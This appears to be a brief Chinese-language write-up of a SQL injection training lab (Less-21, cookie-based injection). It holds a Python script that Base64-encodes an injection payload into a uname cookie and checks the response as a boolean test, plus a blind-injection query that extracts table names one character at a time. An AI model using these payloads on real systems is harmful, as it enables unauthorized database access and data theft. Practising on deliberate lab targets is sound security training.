Less-21

说是cookie注入。

 

•  %3d urldecode =
• Base64值为0就是A，为27的就是b。这样，每3个字符产生4位的Base64字符。如果被加密的字符串每3个一组，还剩1或2个字符，使用特殊字符"="补齐Base64的4字
• https://base64.us/ 在线base64 网站
• 

   

   

 

1. # encoding utf-8
   import base64
   import requests as req
   url ='https://sql.alienwares.top/Less-21/index.php'
   str="admin') and 1=2#"
   cookie=base64.b64encode(str.encode('utf-8'))
   header={
       "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'",
       "Cookie":'uname='+cookie.decode('utf-8'),
   }
   res=req.get(url,headers=header)
   # if('Delete Your Cookie' in res.content.decode('utf-8')):
   #     print('succes')
   #
   # else:
   #     print('error')
    
   if('../images/slap1.jpg' in res.content.decode('utf-8')):
       print('error')
   else:
       print('succes')

    

2. select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'